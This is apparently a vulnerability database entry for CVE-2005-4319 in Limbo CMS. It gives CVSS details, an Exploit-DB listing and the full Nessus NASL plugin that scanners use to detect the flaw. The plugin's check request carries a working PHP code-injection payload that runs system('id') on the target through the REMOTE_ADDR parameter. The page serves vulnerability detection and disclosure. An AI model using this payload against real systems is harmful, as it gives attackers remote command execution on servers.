Vulnerabilities > CVE-2005-4319 - Unspecified vulnerability in Limbo CMS Limbo CMS

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
limbo-cms
nessus
exploit available
NVD
Published: 2005-12-17
Updated: 2018-10-19

Summary

Directory traversal vulnerability in index2.php in Limbo CMS 1.0.4.2 and earlier allows remote attackers to include arbitrary PHP files via ".." sequences in the option parameter.

Vulnerable Configurations

Part Description Count
Application
Limbo_Cms
1

Exploit-Db

descriptionLimbo CMS 1.0.4 .2 index2.php option Parameter Traversal Arbitrary File Access. CVE-2005-4319. Webapps exploit for php platform
idEDB-ID:26837
last seen2016-02-03
modified2005-12-14
published2005-12-14
reporterrgod
sourcehttps://www.exploit-db.com/download/26837/
titleLimbo CMS 1.0.4.2 - index2.php option Parameter Traversal Arbitrary File Access

Nessus

NASL familyCGI abuses
NASL idLIMBO_MULTIPLE_FLAWS.NASL
descriptionThe remote host is running Limbo CMS, a content-management system written in PHP. The remote version of this software is vulnerable to several flaws including : - If register_globals is off and Limbo is configured to use a MySQL backend, then a SQL injection is possible due to improper sanitization of the
last seen2020-06-01
modified2020-06-02
plugin id20824
published2006-01-30
reporterThis script is Copyright (C) 2006-2018 Josh Zlatin-Amishav
sourcehttps://www.tenable.com/plugins/nessus/20824
titleLimbo CMS Multiple Vulnerabilities
code
#
# This script was written by Josh Zlatin-Amishav <josh at ramat dot cc>
# GPLv2
#

include("compat.inc");

if(description)
{
 script_id(20824);
 script_version ("1.14");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2005-4317", "CVE-2005-4318", "CVE-2005-4319", "CVE-2005-4320");
 script_bugtraq_id(15871);
 
 script_name(english:"Limbo CMS Multiple Vulnerabilities");
 script_summary(english:"Checks for multiple vulnerabilities in Limbo");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
numerous vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Limbo CMS, a content-management system
written in PHP. 

The remote version of this software is vulnerable to several flaws
including :

  - If register_globals is off and Limbo is configured to use 
    a MySQL backend, then a SQL injection is possible due to 
    improper sanitization of the '_SERVER[REMOTE_ADDR]' 
    parameter.

  - The installation path is revealed when the 'doc.inc.php', 
    'element.inc.php', and 'node.inc.php' files are reqeusted 
    when PHP's 'display_errors' setting is enabled.

  - A cross-site scripting attack is possible when the Stats 
    module is used due to improper sanitization of the 
    '_SERVER[REMOTE_ADDR]' parameter.

  - Arbitrary PHP files can be retrieved via the 
    'index2.php' script due to improper sanitation of the 
    'option' parameter.

  - An attacker can run arbitrary system commands on the 
    remote system via a combination of the SQL injection 
    and directory transversal attacks." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/419470" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b3b5f19" );
 script_set_attribute(attribute:"solution", value:
"Apply the patch from the references above." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/14");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2006-2020 Josh Zlatin-Amishav");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

# The script code starts here

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


http_check_remote_code_ka(
  extra_dirs:"",
  check_request:string("/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1"),
  check_result:"uid=[0-9]+.*gid=[0-9]+.*",
  command:"id",
  port:port,
  xss: 1, sql_inject: 1
);

References